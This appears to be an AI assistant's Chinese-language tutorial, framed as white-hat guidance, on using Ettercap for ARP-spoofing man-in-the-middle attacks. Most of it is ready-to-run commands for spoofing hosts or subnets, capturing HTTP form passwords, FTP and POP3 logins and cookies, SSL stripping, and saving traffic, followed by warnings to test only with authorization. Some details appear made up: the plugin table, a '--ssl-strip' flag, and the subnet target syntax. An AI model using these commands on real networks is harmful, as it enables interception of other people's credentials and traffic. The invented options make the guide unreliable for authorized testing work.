Ettercap 的高效使用核心在于明确攻击场景+选对模式 / 插件+提前解决配置问题(比如你刚才遇到的 SSL 解析、IPv6 临时地址问题)。作为白帽子,我们主要用它做中间人攻击(MITM)、流量嗅探、密码捕获、ARP 欺骗等合法渗透测试操作。
下面按常用场景给你分步讲解高效用法,每个场景都带直接可用的命令、核心参数和注意事项,全程贴合 Kali Linux 环境和白帽子测试规范。
前提:先解决启动时的两个关键问题
在高效使用前,必须先修复你刚才输出中的两个警告,否则核心功能(如 SSL 解密)会失效:
1. 修复 SSL 解析功能(关键:支持 HTTPS 流量捕获)
编辑 ettercap 主配置文件:
bash
运行
vim /etc/ettercap/etter.conf步骤 1:找到redir_command_on配置块
根据你的系统(Kali 是 Linux),取消对应行的注释(删除行首的#),修改后如下:
conf
# Redir command for Linux redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"步骤 2:保存退出后,重启 ettercap 即可生效
2. 禁用 IPv6 临时地址(避免干扰嗅探)
临时禁用(本次会话有效):
bash
运行
echo 0 > /proc/sys/net/ipv6/conf/eth0/use_tempaddr永久禁用(重启后生效):
bash
运行
echo "net.ipv6.conf.eth0.use_tempaddr = 0" >> /etc/sysctl.conf sysctl -p场景 1:最常用 - ARP 欺骗中间人攻击(核心功能)
ARP 欺骗是 Ettercap 最经典的用法,原理是向目标主机和网关发送伪造的 ARP 包,让自己成为两者之间的 “中间人”,从而捕获双向流量。
核心命令(分 3 种情况)
情况 1:欺骗单个目标主机(目标 IP + 网关 IP)
bash
运行
ettercap -Tq -i eth0 -M arp:remote /目标IP/ /网关IP/示例:欺骗 192.168.1.100(目标主机)和 192.168.1.1(网关):
bash
运行
ettercap -Tq -i eth0 -M arp:remote /192.168.1.100/ /192.168.1.1/情况 2:欺骗整个子网(所有主机 + 网关)
bash
运行
ettercap -Tq -i eth0 -M arp:remote /网关IP/ /255.255.255.0/示例:欺骗 192.168.1.0/24 子网所有主机和网关 192.168.1.1:
bash
运行
ettercap -Tq -i eth0 -M arp:remote /192.168.1.1/ /255.255.255.0/情况 3:双向欺骗(目标 A ↔ 目标 B)
bash
运行
ettercap -Tq -i eth0 -M arp:remote /目标AIP/ /目标BIP/核心参数说明
-M arp:remote:启用 ARP 欺骗模式,remote表示双向欺骗(目标 ↔ 网关),如果用local则是单向欺骗。/IP/:必须用斜杠包裹 IP 地址,这是 Ettercap 的语法要求。
高效技巧
- 先扫描子网存活主机:用
ettercap -Tq -i eth0先扫描(如你刚才的操作),获取目标 IP 和网关 IP。 - 配合流量保存:加
-w 流量文件.pcap参数,将捕获的流量保存为 pcap 文件,后续用 Wireshark 分析:bash
运行
ettercap -Tq -i eth0 -M arp:remote /192.168.1.100/ /192.168.1.1/ -w mitm_traffic.pcap - 停止欺骗:按
Ctrl+C后,Ettercap 会自动发送恢复 ARP 表的包(关键!避免测试后目标主机断网)。
场景 2:密码捕获(明文 / 弱加密协议)
Ettercap 内置了大量密码捕获插件,可以自动解析 HTTP、FTP、Telnet、POP3 等明文协议的账号密码,甚至支持部分弱加密协议(如 IMAP)。
核心用法:ARP 欺骗 + 加载密码插件
步骤 1:启动 ARP 欺骗并加载插件
bash
运行
ettercap -Tq -i eth0 -M arp:remote /目标IP/ /网关IP/ -P 插件名常用插件(直接替换插件名)
| 插件名 | 功能 | 支持协议 |
|---|---|---|
pop3 | 捕获 POP3 邮箱密码 | POP3(110 端口) |
ftp | 捕获 FTP 服务器密码 | FTP(21 端口) |
telnet | 捕获 Telnet 登录密码 | Telnet(23 端口) |
http_cookie | 捕获 HTTP Cookie | HTTP(80 端口) |
http_passwd | 捕获 HTTP 表单密码(POST) | HTTP(80 端口) |
msn | 捕获 MSN 聊天密码 | MSN 协议 |
示例:捕获目标主机的 HTTP 表单密码和 FTP 密码
bash
运行
# 同时加载多个插件,用逗号分隔 ettercap -Tq -i eth0 -M arp:remote /192.168.1.100/ /192.168.1.1/ -P http_passwd,ftp高效技巧
- 优先用
http_passwd插件:Web 表单密码是最常见的测试目标,该插件会自动解析 POST 请求中的账号密码。 - 查看捕获结果:在终端中实时输出,同时会保存到
/root/.ettercap/logs/目录下的日志文件。
场景 3:SSL/TLS 流量解密(HTTPS 协议)
修复了redir_command_on配置后,就可以用 Ettercap 进行SSL 中间人攻击,解密 HTTPS 流量(原理是伪造证书,需要目标主机信任伪造的证书,测试环境下可手动信任)。
核心命令
bash
运行
ettercap -Tq -i eth0 -M arp:remote /目标IP/ /网关IP/ --ssl-strip关键参数
--ssl-strip:启用 SSL 剥离功能,将 HTTPS 请求强制转换为 HTTP 请求,从而捕获明文流量。
注意事项
- 该方法对现代浏览器(如 Chrome、Firefox)效果有限,因为浏览器会检测证书伪造(显示 “不安全连接”)。
- 测试环境下:可在目标主机上手动信任 Ettercap 生成的根证书(路径:
/etc/ettercap/certs/ettercap-ca.crt)。 - 替代方案:使用
sslstrip工具(Kali 内置)配合 Ettercap,效果更好。
场景 4:被动嗅探(不主动欺骗,仅捕获流量)
如果不需要中间人攻击,仅需被动捕获子网内的广播流量或流经本机的流量,可用被动嗅探模式(就是你最初执行的命令,加上一些优化参数)。
核心命令
bash
运行
# 被动嗅探 + 保存流量 + 只捕获 TCP 流量 ettercap -Tq -i eth0 -w passive_traffic.pcap -f tcp关键参数
-f 过滤规则:按协议过滤流量,支持tcp、udp、icmp等,减少无用流量。-w 文件名:保存流量到 pcap 文件,后续用 Wireshark 分析。
高效使用的通用技巧
- 熟悉纯文本界面命令:启动后按
h查看帮助,常用命令:p:加载 / 卸载插件s:扫描子网主机q:退出工具(自动恢复 ARP 表)
- 配合 Wireshark 分析流量:Ettercap 擅长捕获和欺骗,Wireshark 擅长深度分析,将 Ettercap 保存的 pcap 文件导入 Wireshark,能高效定位关键流量。
- 测试前确认网络拓扑:确保你的 Kali 主机和目标主机在同一子网(ARP 欺骗仅在同一广播域内有效)。
- 使用安静模式 + 日志保存:
-q参数减少冗余输出,同时用-l 日志文件参数保存详细日志,方便后续复盘。 - 避免误操作:测试完成后必须按
Ctrl+C正常退出,让 Ettercap 发送 ARP 恢复包,否则目标主机会一直无法访问网关。
白帽子重要提醒
- 仅在授权环境下使用:ARP 欺骗、流量嗅探等操作属于网络攻击行为,必须获得目标网络或主机的书面授权,否则涉嫌违法。
- 测试环境建议:用自己的服务器(如你拥有的服务器)和虚拟机搭建测试环境(Kali + Windows 虚拟机 + 路由器),全程在自己的网络内操作。
- 遵守法律法规:《网络安全法》《刑法》等法律对网络攻击行为有明确处罚规定,白帽子的核心是合法测试,保护网络安全。
下一步高效操作建议
- 先在你的测试环境中(如 Kali 虚拟机 + 另一台虚拟机)执行ARP 欺骗 + http_passwd 插件命令,验证密码捕获功能。
- 尝试将捕获的 pcap 流量文件导入 Wireshark,分析其中的 HTTP 表单数据。
)
)
)
